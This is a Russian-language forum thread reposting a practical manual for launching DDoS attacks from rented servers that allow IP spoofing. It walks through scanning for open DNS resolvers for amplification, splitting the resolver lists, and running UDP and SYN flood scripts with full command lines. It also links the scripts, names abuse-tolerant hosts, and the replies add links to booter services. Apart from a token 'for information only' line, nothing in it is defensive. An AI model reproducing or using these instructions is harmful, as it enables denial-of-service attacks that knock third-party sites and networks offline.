Инструкция Делаем ддос-атаку с блекджеком и ***

Тема в разделе "Защита от DDOS своими силами", создана пользователем X-Shar, 9 дек 2015.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.814
    Симпатии:
    434
    Пол:
    Мужской
    Репа:
    +970 / 153 / -29
    Jabber:
    Telegram:
    Всем привет !

    Чот меня прорвало, но долго я искал ман. как делают ддос атаки вандалы, ведь верится с трудом что они платять 100$ и более, но тем не менее даже этот ресурс долго лежал, пока не поставили защиту, которая кстати стоит денег...

    Статей путных так и не было и вот нашёл, не сочтите за рекламу, но я от куда беру статьи всегда ставлю линки, оригинал взял от сюда:http://rat-club.ru

    Также рекомендую вначале почитать статью этого-же пользователя:На заметку - Dos и DDos для новичков.Основы

    Итак сама статья уже практическая, как-же скрипт-кидди ложат сайты:

    Как сказал один мой друг: виндовый ддос бот есть шлак, в любых его проявлениях!

    Так оно и есть, эпоха ддос атак с многочисленных ботнетов давно прошла. Причин тому достаточно:

    - нет нормальных загрузок, продают в основном одно говно в сто рук;

    - нет нормального софта в паблике и в продаже, продают различные переделки с сорцов диртджампера, изменив несколько строчек кода и дизайн админки;

    - из за причин выше боты мрут буквально как мухи, содержать большой ддос ботнет выходит очень затратно;

    - средства защиты от ддос атак сейчас доступны каждому. некоторые хостеры держат 100/150/200 гбит. Провести такую атаку используя винботов нереально. Даже если боты сгенерируют столько траффика (для этого нужны сотни тысяч ботов!!), антиддос системы все равно быстренько перебанят всех ботов и атака будет отбита.

    Современные ддосеры уже давно позабыли что такое дирт джамперы и г-боты и проводят атаки с выделенных nix серверов с широкими каналами. И сервера не простые, а те, где работает ip spoofing (подмена обратного айпи адреса).

    В основном это upd amplification и syn flood, который в nix благо может быть реализован.

    В этом небольшом, так сказать, мануале, я покажу новичкам как проводить такие атаки:

    1)Нам понадобится:

    - SSH клиент, для отдачи команд серверам. Рекомендую xshell
    Скачать: Product Download Latest Products

    - FTP клиент, что бы распределять днс листы по серверам, любой который вам нравится. Можно юзать wget, но когда серверов много через фтп клиент удобнее

    - Утилитка для разделения txt файла на части. Я использовал split

    - Собственно сами скрипты udp, syn и сканнер открытых днс резолверов для udp amplification (так же добавил ntp attack и ntp checker с аналогичным принципом использования) Скриты могу позже выложить побольше)
    Скачать: https://mega.co.nz/#!6xl3SIaK!stJbF...x_nVoVzENC7LeEA

    - Ну и конечно сами сервера. Например Ecatel • Dedicated servers in Amsterdam - Home любимый всеми ддосерами. На серверах по 155 евро спуффинг благо еще работает.

    Покупаем centos или debian 64 bit, без панели управления. Она нам не нужна, нам нужен только ssh.
    В конце мануала я еще дам ссылки на хостеров у которых можно арендовать нужные сервера.

    2)Ну вот, предположим вы купили сервер. Коннектимся к нему через ssh клиент.


    Сначала установим glibc необходимый для работы скриптов:
    yum install glibc.i686 если centos
    apt-get install glibc.i686 если debian

    Далее заливаем udp, syn и scan на сервер через фтп клиент или
    wget host.com - Deze website is te koop! - de beste bron van informatie over Host. и тд.
    Ставим на них права 777 в фтп клиенте или
    chmod -R 777 syn

    3)На этом пока все, теперь переходим к днс листам.

    Для udp amplification нам понадобятся списки открытых днс резолверов с нужным нам ответом от них.

    Благо хостеру ecatel абсолютно похуй чем вы занимаетесь на своих серверах, поэтому можно смело сканить прямо с них. В других датацентрах я бы не советовал так делать, потому что большинство абуз приходят как раз таки за скан. И вообще что бы насканить лист хватит какой нибудь впски с 100 мбит каналом.

    На каждый сервер нужно примерно 20к днсок, которые мы насканим при помощи скрипта scan. Учтите что на каждый сервер нужен отдельный лист, поэтому если у вас несколько серверов, мы насканим один большой лист и распилим его на нужное количество частей.

    Пример использования:
    ./scan 1 99999 list.txt 3 admin.gull.ca 3800
    Где:
    1 - начало диапазона
    99999 - конец диапазона
    list.txt - файл куда будут сохранятся днски
    3 - количество потоков, 3 как раз на гигабитный канал
    admin.gull.ca - домен для скана с кучей А записей
    3800 - размер ответа в байтах.

    4)Мануал по тому как сделать свой домен для скана я приложу чуть позже в дополнение к этому мануалу, а пока домены берем халявные у этих пидоров:

    DNS Amplification Attacks Observer
    Проверяем их командой dig:
    dig A admin.gull.ca
    или
    dig ANY admin.gull.ca
    Если ответ 3800+ - смело сканим на этот домен.

    И так с этим разобрались, у нас есть готовый list.txt c днсками внутри. Теперь нужно распилить его утилиткой split на нужное количество частей.

    Например лист получился 10598412 байт, нужно 3 листа на 3 сервера. Запускаем через cmd:
    split list.txt 3532804
    И утилитка порежет list.txt на куски по 3532804 байт, то есть на 3 равные части.

    Теперь берем эти листы и распределяем по серверам.
    Можете другой утилиткой это делать, главное принцип понятен.

    Готово? Можно ддосить !

    Udp flood запускаем так:
    ./udp 121.2.2.10 80 list.txt 99 1000
    80 - порт
    list.txt - лист наш естественно
    99 - количетсво потоков, больше 100 ставить не рекомендую
    1000 - длительность атаки в секундах.

    Syn flood запускаем так:
    ./syn 121.2.2.10 21 100 -1 1000
    21 - порт
    100 - количество потоков, больше 100 тоже не стоит ставить
    -1 - лимит pps, то есть -1 это без лимита
    1000 - длительность атаки в секундах.

    Один сервер генерирует около 10-11 гбит udp траффика и около 1 млн pps syn пакетов. Это именно для серверов ecatel. В других датацентрах ппс и гигабиты на выходе могут отличаться.

    Использовать сервера в разы эффективнее и дешевле обходится чем содержание большого ботнета.
    Да, все делается ручками, это вам не штормбот . Зато на халяву

    Надеюсь информация эта будет кому нибудь полезна, если хоть один чел отсюда узнает что то для себя новое - значит я не зря все это писал .
    Если что то интересует, спрашивайте, дополню расскажу подскажу разжую помогу. Успехов, дедосеры


    Вот несколько дц где еще можно купить сервера со спуфингом:

    hxxp://www.servermania.com/
    hxxp://www.us.unmetered.com/
    hxxp://unit-is.com/

    ИНФА ДЛЯ ОЗНАКОМЛЕНИЯ !!!
     
    • Мне нравится Мне нравится x 3
  2. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.188
    Симпатии:
    11.100
    Пол:
    Мужской
    Репа:
    +11.248 / 47 / -6
    Jabber:
    Skype:
    Дудосеру на заметку.

    Код:
    http://quezstresser.com/
    http://orcahub.com/
    https://www.ipstresser.com/


    17.
     
  3. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.814
    Симпатии:
    434
    Пол:
    Мужской
    Репа:
    +970 / 153 / -29
    Jabber:
    Telegram:
    Чот нихрена не ддосит, даже сайты без защиты не ложат, нет там никаких 15 Gbs, по крайне-мере на бесплатном тарифе, даже 100 мегабитную сеть не может положить...:)
     
  4. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.188
    Симпатии:
    11.100
    Пол:
    Мужской
    Репа:
    +11.248 / 47 / -6
    Jabber:
    Skype:
    Ещё один
    Код:
    http://boot4free.com/
     

Поделиться этой страницей